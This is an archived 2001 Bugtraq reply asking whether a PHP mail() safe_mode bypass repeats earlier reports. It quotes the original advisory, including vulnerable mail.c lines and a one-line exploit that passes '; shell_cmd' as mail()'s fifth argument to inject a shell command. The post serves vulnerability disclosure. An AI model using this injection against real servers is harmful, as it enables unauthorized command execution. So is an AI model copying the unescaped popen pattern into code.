[21651] in bugtraq
Re: php mail function bypass safe_mode restriction
daemon@ATHENA.MIT.EDU (Stuart Moore)
Thu Jul 19 13:00:34 2001
Message-ID: <3B567368.233FE64@securitytracker.com>
Date: Thu, 19 Jul 2001 01:43:04 -0400
From: Stuart Moore <info@securitytracker.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com, sintes@nfrance.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi. I might be having a case of deja vu, because this problem sounds
familiar. Is this problem different from the one posted by Joost Pol <
joost@contempt.nl > on Sat Jun 30 2001 12:40:06 ("php breaks safe
mode")? In that one, a problem with an extra 5th parameter that was
added to the mail() command and broke safemode was described, affecting
4.0.5.
See: http://www.securityfocus.com/bid/2954
Also, from January 2000 there was a report of a problem in PHP 3 where
the popen() command, used by mail(), fails to be applied to the
EscapeShellCmd() command.
See: http://www.securityfocus.com/bid/911
So, is the problem w/ popen() or with mail()?
Stuart
----------------------------
Stuart Moore
SecurityTracker.com
SecurityGlobal.net LLC
smoore @ securityglobal.net
----------------------------
-----------------------------------------------------------------
php mail() function does not do check for escape shell commandes,
even if php is running in safe_mode.
So it's may be possible to bypass the safe_mode restriction and gain
shell access.
Affected:
php4.0.6
php4.0.5
Significatives lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");
Exploit:
mail("toto@toto.com",
"test",
"test",
"test",
"; shell_cmd");
-----------------------------------------------------------------
